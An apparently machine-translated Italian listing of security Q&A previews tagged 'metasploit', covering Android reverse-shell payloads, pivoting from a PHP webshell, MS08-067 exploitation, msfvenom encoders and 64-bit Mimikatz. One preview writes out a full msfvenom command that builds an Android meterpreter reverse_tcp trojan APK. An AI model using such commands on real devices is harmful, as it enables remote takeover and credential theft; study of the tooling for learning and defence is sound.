Domande con tag 'metasploit'

domande con tag
2
risposte

Come testare il mio sito web per la vulnerabilità YAML delle rotaie

Sono abbastanza perplesso su come testare la mia app per le rotaie per la vulnerabilità YAML per prima cosa, ho eseguito l'aggiornamento alle ultime versioni 3.2.11 e ho provato questo Mi ha dato not likely to be vulnerable or URIPATH...
posta 02.02.2013 - 09:31
2
risposte

Informazioni sulla generazione di file Exe dagli script Metasploit

Sono un novizio del framework Metasploit. Voglio creare un'applicazione standalone (un file exe) che sfrutti la vulnerabilità MS08-067. È possibile che io abbia l'applicazione generata da Metasploit Exploit Scripts? Ho letto un articolo all'i...
posta 06.01.2013 - 07:01
3
risposte

Port forwarding per reverse tcp

Sto utilizzando metasploit per creare un payload per telefono Android (per scopi didattici). Se il mio obiettivo e il mio computer si trovano sulla stessa rete, funziona correttamente. Ma quando il mio obiettivo non è connesso a una rete dive...
posta 15.03.2018 - 03:22
3
risposte

Metasploit tramite webshell

Sono stato in grado di ottenere una shell inversa php su un server web, diciamo X che è dietro ogni sorta di sicurezza perimetrale. Ora voglio indirizzare una macchina sulla stessa LAN con X, come faccio a configurare metasploit per quello e...
posta 27.01.2017 - 05:35
2
risposte

Metasploit Framework: rimuovere le vulnerabilità dal database?

È possibile rimuovere le vulnerabilità nel database di Metasploit Frameworks che ho importato da Nexpose e Nessus? Voglio rimuovere le vulnerabilità dal database mantenendo i servizi nel database. Ho provato a usare il comando msf > host...
posta 01.12.2016 - 08:28
1
risposta

Scansione versione SSH non riuscita per Windows XP SP2

Stavo provando a scansionare la versione SSH per Windows XP usando "Scanner SSH Auxiliary Module" nel framework metasploit. Tuttavia, durante la scansione non si sono verificati errori, ma non è stato possibile identificare la versione come most...
posta 20.11.2016 - 19:58
1
risposta

Metasploit crea file .ZIP invece di file .APK?

Mi sono esercitato usando un vecchio dispositivo Android e Kali Linux. Ho impostato il file .kap trojan come al solito, usando il comando msfvenom -p android/meterpreter/reverse_tcp LHOST=MyIP LPORT=RandomPort R> /root/Android.apk Inizia...
posta 17.01.2017 - 10:41
1
risposta

cosa significa "Rank" in msfvenom?

Nell'output della schermata di seguito da msfvenom quando si elencano tutti gli encoder supportati con -l encoders ; che cosa significa " Rank " esattamente?     
posta 10.03.2017 - 19:53
1
risposta

Codifica payload metasploit con ContextEncoding?

Usando metasploit ho generato un exploit exploit/windows/fileformat/ms14_017_rtf per windows 7 con windows/shell_reverse_tcp payload . In mostra avanzata, utilizzo l'opzione EnableContextEncoding true e funziona bene. Quindi creo u...
posta 11.01.2016 - 16:23
1
risposta

Come si invia uno stager meterpreter a 64 bit? [chiuso]

Tutti gli stagers che vengono inviati sembrano essere a 32 bit. Questo va bene, fino a quando non devo eseguire Mimikatz che su un sistema a 64 bit è necessario eseguire il mimikatz a 64 bit. Dato che la Mimikatz a 64 bit non funzionerà con il m...
posta 09.03.2015 - 10:29